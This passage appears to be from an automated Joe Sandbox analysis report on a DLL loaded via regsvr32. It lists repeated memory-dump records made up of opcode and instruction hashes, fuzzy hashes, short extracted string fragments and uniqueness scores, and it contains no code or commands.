                                                                                                                                            • Opcode Fuzzy Hash: 2a9d8457aa34911385b660402f71547a5181f90184c5f28ce50b42f7ee7f8c58
                                                                                                                                            • Instruction Fuzzy Hash: A481FA3761CB59D2DB24CF55E49022AB7A0FB88B54F204936EA8D43B94DFBED441CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 8('$6fA$9\D$OG3
                                                                                                                                            • API String ID: 0-2292045659
                                                                                                                                            • Opcode ID: 075f2f4683c67ac2050461b4b976e23f7824189084b04fb6fcbf6660b49be205
                                                                                                                                            • Instruction ID: ef0df636cc5d4b1adb12f513697d006f7e6ff77cbfd46ce7bca5e6c4611c7a17
                                                                                                                                            • Opcode Fuzzy Hash: 075f2f4683c67ac2050461b4b976e23f7824189084b04fb6fcbf6660b49be205
                                                                                                                                            • Instruction Fuzzy Hash: 6E8166B591130DCFDB98CF28C18A5CA3BA8FF55318F00412AFC1E9A264D3B4E959CB46
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: !j$IzY$w4$0Oa
                                                                                                                                            • API String ID: 0-1210086663
                                                                                                                                            • Opcode ID: d22984424f9e842513d0b81fbf00519d97f66b1438588327bee25b78db1a615b
                                                                                                                                            • Instruction ID: d6ae16ce1753066c3a100fad89cd7b933425bd3752a83aacc50f13ca8011d066
                                                                                                                                            • Opcode Fuzzy Hash: d22984424f9e842513d0b81fbf00519d97f66b1438588327bee25b78db1a615b
                                                                                                                                            • Instruction Fuzzy Hash: 4E41CFB090034E8BCF88CF65C48A5DE7FB0FB68358F104619E916A6250D7B896A9CFC5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: !fl$>q$>q
                                                                                                                                            • API String ID: 0-3196423155
                                                                                                                                            • Opcode ID: dccb224850b43dda665c2028c8e90cf7ac528c4769e1ed18f59b4bae66e0f67a
                                                                                                                                            • Instruction ID: 6e0169028e0bb78a63dbed9d1dbc36ce20ef11fe4735bb4ca27ada0b4c61fd75
                                                                                                                                            • Opcode Fuzzy Hash: dccb224850b43dda665c2028c8e90cf7ac528c4769e1ed18f59b4bae66e0f67a
                                                                                                                                            • Instruction Fuzzy Hash: 18022574A0670CDBCBA9CFA8E48A69DBBF1FF14388F104119F816A7261C7B49919CB45
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: "Gd$C2$HG
                                                                                                                                            • API String ID: 0-142661339
                                                                                                                                            • Opcode ID: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                                                                                                            • Instruction ID: f3040b85d87bafdcd4b0814e46a5c4b4479db0c4bbfe4c952327208bca537128
                                                                                                                                            • Opcode Fuzzy Hash: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                                                                                                            • Instruction Fuzzy Hash: 20C112719047CD8FDB89CFA8C88A6ED7BB1FB48354F104229F80697660DBB4D949CB81
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: QZB$Vu9($W1Z
                                                                                                                                            • API String ID: 0-4157987319
                                                                                                                                            • Opcode ID: 1f5c37778751f5a7f2813f46734b265b9b5d3f173c04e1f04c47467fdefc8410
                                                                                                                                            • Instruction ID: f699ba934c7511d53ebf66ced97cbd47477d8f387fb8544ab73dfc8f8e8f4cc9
                                                                                                                                            • Opcode Fuzzy Hash: 1f5c37778751f5a7f2813f46734b265b9b5d3f173c04e1f04c47467fdefc8410
                                                                                                                                            • Instruction Fuzzy Hash: 7DE1E870505B888FDBB9DF24CC897EBBBE1FB84705F10551EE84A9A290DBB49648CF41
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #X$1c+$,p
                                                                                                                                            • API String ID: 0-4193689514
                                                                                                                                            • Opcode ID: 870c2a5dff4c858b49c61e00ad2e43c057056019502a976b576cc033676d3952
                                                                                                                                            • Instruction ID: a14642629d5f8cbd2a1e8fb09d7711f81952208659678b8c12dc59c418106fb0
                                                                                                                                            • Opcode Fuzzy Hash: 870c2a5dff4c858b49c61e00ad2e43c057056019502a976b576cc033676d3952
                                                                                                                                            • Instruction Fuzzy Hash: A0F166B5906749CFCB88DF68C28A58D7BF1BF59304F404129FC1A9A260D3B4E529CB49
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: :a$o1$F
                                                                                                                                            • API String ID: 0-2167756397
                                                                                                                                            • Opcode ID: 1dc69b1f9148db4d8f727193868d76463b7f9b687988be903e8d180db9dc4b1f
                                                                                                                                            • Instruction ID: c7b3f013bdef5c33efa64e5817367d2177fa9b070e37e7fa0e85b95e6b1d5a97
                                                                                                                                            • Opcode Fuzzy Hash: 1dc69b1f9148db4d8f727193868d76463b7f9b687988be903e8d180db9dc4b1f
                                                                                                                                            • Instruction Fuzzy Hash: 24A10170514609DFCB98DF28C58A6DE3BE1FF58318F40822AFC0A9B264C774DA58DB85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: "7F$hso$|
                                                                                                                                            • API String ID: 0-2223032787
                                                                                                                                            • Opcode ID: a1c5852e2975669cd72ae99173752b080c1a60bb39e1eda62f5b8b24312d50f2
                                                                                                                                            • Instruction ID: 597be8bf6f8274430a7b1b716aee764a508e33f64a18c5174bbc12e988f7dea5
                                                                                                                                            • Opcode Fuzzy Hash: a1c5852e2975669cd72ae99173752b080c1a60bb39e1eda62f5b8b24312d50f2
                                                                                                                                            • Instruction Fuzzy Hash: CDA1E7716057888FEB7ADF64C8AA7DE7BA1FF59308F40461DD98E8E250C7B45608CB42
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: eG$ktw$l$6
                                                                                                                                            • API String ID: 0-3696190584
                                                                                                                                            • Opcode ID: cfb728ef8011932e57c4461def4d81df8b30877acb09ef5991ab02cb5d25377a
                                                                                                                                            • Instruction ID: ec7ece3e5b0c03f4df558a0a1733d02cea5b85f33e09dae2f6683fda9d55fcb2
                                                                                                                                            • Opcode Fuzzy Hash: cfb728ef8011932e57c4461def4d81df8b30877acb09ef5991ab02cb5d25377a
                                                                                                                                            • Instruction Fuzzy Hash: E47114B0509708EFCB98DF68C089A9E7BB1FB88344F40C52EE849DB264C775DA19CB45
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: %Di|$6qp$Z9s
                                                                                                                                            • API String ID: 0-2690900941
                                                                                                                                            • Opcode ID: 036a56b574e0cc9d8bbe6e2c16f1c72bf3a7a337ff5cb561951f94e63896fd73
                                                                                                                                            • Instruction ID: 2c0d7369d6c4e2fe59306caeaa3cf354025216a739d91ba443ab140e2def37b4
                                                                                                                                            • Opcode Fuzzy Hash: 036a56b574e0cc9d8bbe6e2c16f1c72bf3a7a337ff5cb561951f94e63896fd73
                                                                                                                                            • Instruction Fuzzy Hash: 9C61257191070C9BCB88CF24C8C96DE7BB1FB483A8F556219FC0AAA294C7749985CF84
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Fl$Fl$vv5
                                                                                                                                            • API String ID: 0-3053741108
                                                                                                                                            • Opcode ID: 56c6ca64a2739fcec8bf5f3302d493d90fa60cbb6fd5cd63e6a43fd0d8d3c1f6
                                                                                                                                            • Instruction ID: 55f6967587c9a541224425d329b03615816d53db549f94b6db3b05c8e91cbb03
                                                                                                                                            • Opcode Fuzzy Hash: 56c6ca64a2739fcec8bf5f3302d493d90fa60cbb6fd5cd63e6a43fd0d8d3c1f6
                                                                                                                                            • Instruction Fuzzy Hash: FC511A70E4870CAFDB69DFA8E0866DDBBF1FB58344F004519E40AE7291DB74990ACB85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: H8$nn$nn
                                                                                                                                            • API String ID: 0-4263809824
                                                                                                                                            • Opcode ID: 01947e023cac002b8a0a3e4f78c79794eac0dde5bb4d18b8413bbe4288169ddb
                                                                                                                                            • Instruction ID: 3c01ac5d5c2d3476a5cfb8eba6abf236e6c64549312703f260b6bb5002efdfbd
                                                                                                                                            • Opcode Fuzzy Hash: 01947e023cac002b8a0a3e4f78c79794eac0dde5bb4d18b8413bbe4288169ddb
                                                                                                                                            • Instruction Fuzzy Hash: 5361D67555878CCBEBBADF38CC897D97BB1FB48344F908219D80E8A260DB7457498B41
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: %Nz$,7%$}]{
                                                                                                                                            • API String ID: 0-2809531587
                                                                                                                                            • Opcode ID: 676dc21c0f372b2db907baa94ef17c562d056d3d3dc12d9c581eeda360082d12
                                                                                                                                            • Instruction ID: b36c8970f11ad41429e233920f6dac2517fe43d92b96f19f813f385ea8bb4fb2
                                                                                                                                            • Opcode Fuzzy Hash: 676dc21c0f372b2db907baa94ef17c562d056d3d3dc12d9c581eeda360082d12
                                                                                                                                            • Instruction Fuzzy Hash: B771E470448788CBEBB5DF24C8856DEBBE4FB88744F60451DE9598B260DB749688CF01
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ,mQ$f41$c
                                                                                                                                            • API String ID: 0-1594525360
                                                                                                                                            • Opcode ID: 7f89cf11389eafb96d04b6400e87a1f2a1e5a7f99f0c72ab3958d5ee7197d732
                                                                                                                                            • Instruction ID: ca916729033610084f534c396dc33c1afc583cc00ddec4c12c7a73cc6334aceb
                                                                                                                                            • Opcode Fuzzy Hash: 7f89cf11389eafb96d04b6400e87a1f2a1e5a7f99f0c72ab3958d5ee7197d732
                                                                                                                                            • Instruction Fuzzy Hash: AD51C071D0424C8BCB48DFA9E98A9DDBBF0FB48348F11820DE85AB7261C7749905CF69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $q~$%s$R3
                                                                                                                                            • API String ID: 0-2520873970
                                                                                                                                            • Opcode ID: 3d3ced99ac42584346b8bad3007d62ef26daa4ae2805a0976e45a495c47b2b96
                                                                                                                                            • Instruction ID: 49708784934b6f27b099c9a4c0d62a5c340693359db0e98dd39e1096da177659
                                                                                                                                            • Opcode Fuzzy Hash: 3d3ced99ac42584346b8bad3007d62ef26daa4ae2805a0976e45a495c47b2b96
                                                                                                                                            • Instruction Fuzzy Hash: 2D414870508784DBD398CF18C0DA65EBBF1FB853A4FA0691DF583862A4DB75D9898B03
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: [/$s$|'
                                                                                                                                            • API String ID: 0-508247755
                                                                                                                                            • Opcode ID: 7345308087df3ea52099129a82f0c3ea94bf5dab89828cea5ac59a44806af735
                                                                                                                                            • Instruction ID: 494a7eb40676bfcc00c7fdba1f25141f52c7cc4812b1f7e8e8b884a852a0e06c
                                                                                                                                            • Opcode Fuzzy Hash: 7345308087df3ea52099129a82f0c3ea94bf5dab89828cea5ac59a44806af735
                                                                                                                                            • Instruction Fuzzy Hash: 1841D4B090038E8FCB48DFA9D88A5DEBBB1FB48348F10461DEC25A6250D7B49554CF95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: _#>$`cb{$fq
                                                                                                                                            • API String ID: 0-41881557
                                                                                                                                            • Opcode ID: 6dffa8c73f5f57da7de5f12e066b229d1e4dd53f1b7788c47ce25402a50e5fa7
                                                                                                                                            • Instruction ID: 8d8b26aa43ab9a83d147a377112b64bfb8255cca975d25c3e902dea97d059722
                                                                                                                                            • Opcode Fuzzy Hash: 6dffa8c73f5f57da7de5f12e066b229d1e4dd53f1b7788c47ce25402a50e5fa7
                                                                                                                                            • Instruction Fuzzy Hash: 2941C0B180078E8FCF48CF64C88A5DE7FB0FB58358F104619E86AA6250D3B89665CFC4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: =Z8$[U${To
                                                                                                                                            • API String ID: 0-582923006
                                                                                                                                            • Opcode ID: 510822f7632221338f4787e6ba9fbd6d482cd1ebd2bab9e95bda9979d09408e7
                                                                                                                                            • Instruction ID: dd1ba70993956fe5376c9027ab0fa5dab7ea2e8642491db667c41f00a9894f6d
                                                                                                                                            • Opcode Fuzzy Hash: 510822f7632221338f4787e6ba9fbd6d482cd1ebd2bab9e95bda9979d09408e7
                                                                                                                                            • Instruction Fuzzy Hash: DA31AFB090074ECBCB88DF64C88A4DF7FB4FB68398F104219E855A6250D3B896A5CFD5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: v^$|8W
                                                                                                                                            • API String ID: 0-4274756280
                                                                                                                                            • Opcode ID: e8f720407405c8f842976055ebfe5a961945bc41caeca3a3e9e3a1284d36038d
                                                                                                                                            • Instruction ID: eb46043f5dfd862e599a3e1f0545fc92660674d3eece30cf186a2abccef00301
                                                                                                                                            • Opcode Fuzzy Hash: e8f720407405c8f842976055ebfe5a961945bc41caeca3a3e9e3a1284d36038d
                                                                                                                                            • Instruction Fuzzy Hash: 23D11171A0630CCBDB68DF68C58AA9D7BE1FF59348F104129FC1A9B261C770E919CB85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: `:$u5\
                                                                                                                                            • API String ID: 0-1141760586
                                                                                                                                            • Opcode ID: de639cec483ce4a43014a1f68f5d3fafad908dcfa8fcc167b954aac45c8ab292
                                                                                                                                            • Instruction ID: 309421123f437f89acc2771e6a55141bc20ba277e2d56715f434ec53ca724750
                                                                                                                                            • Opcode Fuzzy Hash: de639cec483ce4a43014a1f68f5d3fafad908dcfa8fcc167b954aac45c8ab292
                                                                                                                                            • Instruction Fuzzy Hash: 69C1207150574DCBDB99CF28C58A6D93BE5FF98348F104129FC0E862A1CBB4EA18CB46
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 0Au$]6
                                                                                                                                            • API String ID: 0-775207805
                                                                                                                                            • Opcode ID: 41d6d67fb4784ff97a0c8e7ec9a302166e0b0c9de4538925550087b6d031b924
                                                                                                                                            • Instruction ID: 6edab2825e6f92fa7d6d5649e6783b0aef41eda7633721283519dacdcc01bd9d
                                                                                                                                            • Opcode Fuzzy Hash: 41d6d67fb4784ff97a0c8e7ec9a302166e0b0c9de4538925550087b6d031b924
                                                                                                                                            • Instruction Fuzzy Hash: 2DE1D7706047889FCBBEDF24CC897DA7BA8FB46704F904619E9C98E250DB745748CB42
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: S9$qrd
                                                                                                                                            • API String ID: 0-2332744662
                                                                                                                                            • Opcode ID: dccb7ee8ec7dfb8e0809544b932b2caf2d93c57dd19aa3a9b169f23ded853006
                                                                                                                                            • Instruction ID: d3a666ff84b181fad27f9c2352a1e83f1b6bb5c561d3220c9e7978bd2dadc88f
                                                                                                                                            • Opcode Fuzzy Hash: dccb7ee8ec7dfb8e0809544b932b2caf2d93c57dd19aa3a9b169f23ded853006
                                                                                                                                            • Instruction Fuzzy Hash: 6EB1357590660CCFCB69DFA4C08A6DDBBF1EF68344F104519E812AB262CBB0D919CB59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: hw}2$4&t
                                                                                                                                            • API String ID: 0-1169878757
                                                                                                                                            • Opcode ID: 858c4deae444743a57c26792a91effe053d1d8b489a12bfa541918911fc2fcd6
                                                                                                                                            • Instruction ID: fd20564dcf1a671b287a6600624e9fb92dead2187b8d5629211a6de17e7e6b55
                                                                                                                                            • Opcode Fuzzy Hash: 858c4deae444743a57c26792a91effe053d1d8b489a12bfa541918911fc2fcd6
                                                                                                                                            • Instruction Fuzzy Hash: AEB168B590420CCFDB68CF78C45A5DD7BF1FB08308F60612AE826AA262D774D919CF54
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: JMWd$a[
                                                                                                                                            • API String ID: 0-3276560754
                                                                                                                                            • Opcode ID: 94f2740beabb4555a63fe109c076897c128458c56f4cbcfe5625600f94c775f6
                                                                                                                                            • Instruction ID: 3b54873520b9a846c0abc3e4022efff23af49e59c185cad729b6d512d224c3a2
                                                                                                                                            • Opcode Fuzzy Hash: 94f2740beabb4555a63fe109c076897c128458c56f4cbcfe5625600f94c775f6
                                                                                                                                            • Instruction Fuzzy Hash: D5A106706047889FDBBACF18CC857DE3BA8FB46748F504229E8CA8E254CB745749CB42
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: %[$-
                                                                                                                                            • API String ID: 0-2535708364
                                                                                                                                            • Opcode ID: 65f60e6b5a076c6be367ab0f8efb072c07a091d19f07b8aff3e0ecb4ccd985c8
                                                                                                                                            • Instruction ID: a7604732bdc10a899b7b050bfde45695c0722dd065d5eed74db0117fa162c574
                                                                                                                                            • Opcode Fuzzy Hash: 65f60e6b5a076c6be367ab0f8efb072c07a091d19f07b8aff3e0ecb4ccd985c8
                                                                                                                                            • Instruction Fuzzy Hash: 1F81627050074ECBDB99DF14C88A7DE3BA0FB28389F114219FC85962A0D778C699CBC4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: /Mr$i:O:
                                                                                                                                            • API String ID: 0-3426536595
                                                                                                                                            • Opcode ID: 8fba9de9c6c3b1e5047e1d7641fef574ac2ea6f46defdcfa8fbb4029ea408963
                                                                                                                                            • Instruction ID: 3eba081f804be6fa3a9d4fb4db8c82f5607d3411af965209965460f3089a80c7
                                                                                                                                            • Opcode Fuzzy Hash: 8fba9de9c6c3b1e5047e1d7641fef574ac2ea6f46defdcfa8fbb4029ea408963
                                                                                                                                            • Instruction Fuzzy Hash: 7C91087050438C8FDBBADF24C8AA7DE7BA1FB5A304F50461EEA4E8E250DB749644CB41
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
